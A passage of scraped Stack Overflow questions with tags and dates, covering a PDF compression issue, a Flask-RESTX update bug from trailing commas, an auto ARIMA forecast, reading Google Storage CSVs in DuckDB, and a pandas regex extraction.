<p>Even after doing all that, I see the file isn't compressed AT ALL.</p>
<p>This is the output in terminal as u see. The file uploaded (output of and the length of compressed_pdf_bytes is almost same.</p>
<pre><code>#Output of actual file uploaded.
UploadedFile(id=6, name='abc.pdf', type='application/pdf', size=4588407)
#output of compressed file in bytes
4472714
</code></pre>
|
<python><streamlit><pypdf>
|
2023-05-21 00:22:04
| 5
| 7,580
|
Baktaawar
|
76,297,696
| 3,034,686
|
Can't update a record using flask-restx sqlalchemy mariadb v10.5.20 "(mariadb.NotSupportedError) Data type 'tuple'"
|
<p><a href="https://github.com/christianbueno1/flask-api" rel="nofollow noreferrer">github repository</a></p>
<p>This is a simple REST API, have 2 classes Client, Product.</p>
<p><strong>Relationship:</strong> A client can have many products, Client 1---* Product.</p>
<p>I can list, create, search by id, with the 2 models, Client and Product. But now working in the PUT(update) verb, the bellow error is showing</p>
<p><strong>appi_model.py</strong></p>
<pre><code>product_model = api.model("ProductModel", {
"id": fields.Integer,
"sku": fields.String,
"description": fields.String,
"price": fields.Integer,
"quantity": fields.Integer,
"created_on": fields.DateTime,
"updated_on": fields.DateTime,
#relationship
"client": fields.Nested(client_model)
})
product_input_model = api.model("ProductInputModel", {
"sku": fields.String,
"description": fields.String,
"price": fields.Integer,
"quantity": fields.Integer,
#relationship
"client_id": fields.Integer,
})
</code></pre>
<p><strong>resource.py</strong></p>
<pre><code>@ns.route("/product")
class ProductList(Resource):
@ns.marshal_list_with(product_model)
def get(self):
return Product.query.all()
@ns.expect(product_input_model)
@ns.marshal_with(product_model)
def post(self):
product = Product(sku=ns.payload["sku"],
description=ns.payload["description"],
price=ns.payload["price"],
quantity= ns.payload["quantity"] or None,
client_id=ns.payload["client_id"])
db.session.add(product)
db.session.commit()
return product, 201
@ns.route("/product/<int:id>")
class ProductAPI(Resource):
@ns.marshal_with(product_model)
def get(self, id):
product = Product.query.get(id)
if product:
return product
else:
ns.abort(404, f"product with id {id} not found")
@ns.expect(product_input_model)
@ns.marshal_with(product_model)
def put(self, id):
product = Product.query.get(id)
if product:
product.sku = ns.payload["sku"],
product.description = ns.payload["description"],
product.price = ns.payload["price"],
product.quantity = ns.payload["quantity"],
product.client_id = ns.payload["client_id"]
db.session.commit()
return product
else:
ns.abort(404, f"product with id {id} not found")
</code></pre>
<p><strong>model.py</strong></p>
<pre><code>class Product(db.Model):
__tablename__= "product"
id = db.Column(db.Integer, primary_key=True)
sku = db.Column(db.String(25), index=True, nullable=False, unique=True)
description = db.Column(db.String(100), nullable=False)
price = db.Column(db.Numeric(12,4))
quantity = db.Column(db.Integer)
created_on = db.Column(db.DateTime, default=datetime.now)
updated_on = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
client_id = db.Column(db.ForeignKey("client.id"))
client = db.relationship("Client", back_populates="products")
def __repr__(self):
#literal string interpolation '''
return f'''<Product\n{self.id}\n{self.sku}\n{self.description}\n
{self.price}\n{self.quantity}\n{self.client_id}>'''
def __init__(self, sku, description, client_id, price=0, quantity=0):
self.sku = sku
self.description = description
self.client_id = client_id
self.price = price
self.quantity = quantity
</code></pre>
<p>Each time when trying to update a record by the API, for example the product_id=4, with the bellow new information.</p>
<pre><code>{
"sku": "tech-gra-001",
"description": "Nvidia RTX 3080",
"price": 830,
"quantity": 5,
"client_id": 1
}
</code></pre>
<p>I am getting the following Error.</p>
<p><a href="https://i.sstatic.net/Bw3by.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/Bw3by.png" alt="enter image description here" /></a></p>
<pre><code>sqlalchemy.exc.NotSupportedError: (mariadb.NotSupportedError) Data type 'tuple' in column 0 not supported in MariaDB
Connector/Python
[SQL: UPDATE product SET sku=?, description=?, price=?, quantity=?, updated_on=? WHERE product.id = ?]
[parameters: (('tech-gra-001',), ('Nvidia RTX 3080',), (830,), (5,), datetime.datetime(2023, 5, 20, 17, 52, 22, 7187
31), 4)]
</code></pre>
<p>The origin error codeline is</p>
<pre><code>File "/home/chris/Documents/web-projects/crud-flask-product/blueprint/resource.py", line 79, in put
db.session.commit()
File "/home/chris/Documents/web-projects/crud-flask-product/env/lib64/python3.11/site-packages/sqlalchemy/orm/scop
ing.py", line 553, in commit
return self._proxied.commit()
</code></pre>
<p>Any advice is welcome.</p>
|
<python><flask><sqlalchemy><mariadb><flask-restx>
|
2023-05-20 23:17:37
| 1
| 592
|
christianbueno.1
|
76,297,649
| 2,781,105
|
Auto ARIMA in Python results in poor fitting prediction of trend
|
<p>New to ARIMA and attempting to model a dataset in Python using auto ARIMA.
I'm using auto-ARIMA as I believe it will be better at defining the values of p, d and q however the results are poor and I need some guidance.
Please see my reproducible attempts below</p>
<p>Attempt as follows:</p>
<pre><code> # DEPENDENCIES
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import pmdarima as pm
from pmdarima.model_selection import train_test_split
from statsmodels.tsa.stattools import adfuller
from pmdarima.arima import ADFTest
from pmdarima import auto_arima
from sklearn.metrics import r2_score
# CREATE DATA
data_plot = pd.DataFrame(data removed)
# SET INDEX
data_plot['date_index'] = pd.to_datetime(data_plot['date']
data_plot.set_index('date_index', inplace=True)
# CREATE ARIMA DATASET
arima_data = data_plot[['value']]
arima_data
# PLOT DATA
arima_data['value'].plot(figsize=(7,4))
</code></pre>
<p>The above steps result in a dataset that should look like this.
<a href="https://i.sstatic.net/ku2YH.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/ku2YH.png" alt="enter image description here" /></a></p>
<pre><code># Dicky Fuller test for stationarity
adf_test = ADFTest(alpha = 0.05)
adf_test.should_diff(arima_data)
</code></pre>
<p>Result = 0.9867 indicating non-stationary data which should be handled by appropriate over of differencing later in auto arima process.</p>
<pre><code># Assign training and test subsets - 80:20 split
print('Dataset dimensions;', arima_data.shape)
train_data = arima_data[:-24]
test_data = arima_data[-24:]
print('Training data dimension:', train_data.shape, round((len(train_data)/len(arima_data)*100),2),'% of dataset')
print('Test data dimension:', test_data.shape, round((len(train_data)/len(arima_data)*100),2),'% of dataset')
# Plot training & test data
plt.plot(train_data)
plt.plot(test_data)
</code></pre>
<p><a href="https://i.sstatic.net/0HvUn.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/0HvUn.png" alt="enter image description here" /></a></p>
<pre><code> # Run auto arima
arima_model = auto_arima(train_data, start_p=0, d=1, start_q=0,
max_p=5, max_d=5, max_q=5,
start_P=0, D=1, start_Q=0, max_P=5, max_D=5,
max_Q=5, m=12, seasonal=True,
stationary=False,
error_action='warn', trace=True,
suppress_warnings=True, stepwise=True,
random_state=20, n_fits=50)
print(arima_model.aic())
</code></pre>
<p>Output suggests best model is <code>'ARIMA(1,1,1)(0,1,0)[12]'</code> with AIC 1725.35484</p>
<pre><code>#Store predicted values and view resultant df
prediction = pd.DataFrame(arima_model.predict(n_periods=25), index=test_data.index)
prediction.columns = ['predicted_value']
prediction
# Plot prediction against test and training trends
plt.figure(figsize=(7,4))
plt.plot(train_data, label="Training")
plt.plot(test_data, label="Test")
plt.plot(prediction, label="Predicted")
plt.legend(loc='upper right')
plt.show()
</code></pre>
<p><a href="https://i.sstatic.net/RlyZz.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/RlyZz.png" alt="enter image description here" /></a></p>
<pre><code># Finding r2 model score
test_data['predicted_value'] = prediction
r2_score(test_data['value'], test_data['predicted_value'])
</code></pre>
<p>Result: -6.985</p>
|
<python><data-science><prediction><arima><pmdarima>
|
2023-05-20 23:02:23
| 2
| 889
|
jimiclapton
|
76,297,471
| 3,130,747
|
How to read a csv file from google storage using duckdb
|
<p>I'm using duckdb version <code>0.8.0</code></p>
<p>I have a CSV file located in google storage <code>gs://some_bucket/some_file.csv</code> and want to load this using duckdb.</p>
<p>In pandas I can do <code>pd.read_csv("gs://some_bucket/some_file.csv")</code>, but this doesn't seem to work in duckdb. I see that there's some documentation here: <a href="https://duckdb.org/docs/guides/import/s3_import.html" rel="nofollow noreferrer">https://duckdb.org/docs/guides/import/s3_import.html</a>, but I find that confusing as it's mainly aimed at <code>s3</code> usage.</p>
<p>I guess that I have to run:</p>
<pre class="lang-py prettyprint-override"><code>duckdb.sql("INSTALL httpfs;")
duckdb.sql("LOAD httpfs;")
</code></pre>
<p>From the documentation, I'm not sure what the parameters for :</p>
<pre><code>SET s3_access_key_id='key_id';
SET s3_secret_access_key='access_key';
</code></pre>
<p>Would be.</p>
<p>How do I load a csv from google storage in duckdb?</p>
<h2>Edit - approaches which haven't worked</h2>
<p>I've added <code>hmac</code> keys and downloaded them following guide here: <a href="https://cloud.google.com/storage/docs/authentication/managing-hmackeys#gsutil_1" rel="nofollow noreferrer">https://cloud.google.com/storage/docs/authentication/managing-hmackeys#gsutil_1</a></p>
<pre class="lang-py prettyprint-override"><code>import duckdb
import os
duckdb.sql("LOAD httpfs;")
hmac_access = os.getenv('GOOGLE_HMAC_ACCESS_ID')
hmac_secret = os.getenv('GOOGLE_HMAC_SECRET')
duckdb.sql(f"SET s3_access_key_id='{hmac_access}';")
duckdb.sql(f"SET s3_secret_access_key='{hmac_secret}';")
################################################################################
# approach 1
# Doesn't work - fails with:
#
# Traceback (most recent call last):
# File "duck_test.py", line 18, in <module>
# duckdb.sql("SELECT * FROM '{gcp_path_1}'").show()
# duckdb.CatalogException: Catalog Error: Table with name {gcp_path_1} does not exist!
# Did you mean "pg_am"?
# duckdb.sql(f"SELECT * FROM '{gcp_path_1}'").show()
################################################################################
# approach 2
# Fails with:
# Traceback (most recent call last):
# File "duck_test.py", line 32, in <module>
# duckdb.sql(f"SELECT * from read_csv('{gcp_path_1}', AUTO_DETECT=TRUE);")
# duckdb.HTTPException: HTTP Error: HTTP GET error on 'https://some_bucket.s3.amazonaws.com/some_file.csv' (HTTP 400)
duckdb.sql(f"SELECT * from read_csv('{gcp_path_1}', AUTO_DETECT=TRUE);")
</code></pre>
<h2>Edit (working)</h2>
<p>In the code above I forgot to set</p>
<pre class="lang-py prettyprint-override"><code>duckdb.sql("SET s3_endpoint='storage.googleapis.com'")
</code></pre>
<p>After setting this both approaches read from storage.</p>
|
<python><csv><google-cloud-platform><duckdb>
|
2023-05-20 21:46:00
| 2
| 4,944
|
baxx
|
76,297,358
| 12,436,050
|
Replace characters and extract substrings from pandas dataframe
|
<p>I have following pandas dataframe. I would like to replace some characters and extract substrings (there exists more rows in the original dataframe).</p>
<p>I am using following regex but I am unable to replace '?' from some rows like row 6, 7, 8.</p>
<pre><code>df[['label', 'id']] = df['name'].str.extract(r'\{?\??\|?[[{]?(.*?)[]}]?(?:,\s+(\d{3,100}))?\s+\(\d+\)')
</code></pre>
<pre><code>You-Hoover-Fong syndrome, 616954 (3)
Yuan-Harel-Lupski syndrome (4)
Zaki syndrome, 619648 (3)
Zimmermann-Laband syndrome 2, 616455 (3)
Zimmermann-Laband syndrome 3, 618658 (3)
[?Birbeck granule deficiency], 613393 (3)
[?Homosexuality, male] (2)
[?Phosphohydroxylysinuria], 615011 (3)
[Acetylation, slow], 243400 (3)
</code></pre>
<p>The expected output is:</p>
<pre><code>You-Hoover-Fong syndrome 616954
Yuan-Harel-Lupski syndrome
Zaki syndrome 619648
Zimmermann-Laband syndrome 2 616455
Zimmermann-Laband syndrome 3 618658
Birbeck granule deficiency 613393
Homosexuality, male
Phosphohydroxylysinuria 615011
Acetylation, slow 243400
</code></pre>
<p>How can I modify the current regex to include the '?' to remove from the mentioned rows?</p>
|
<python><pandas><regex>
|
2023-05-20 21:09:43
| 2
| 1,495
|
rshar
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.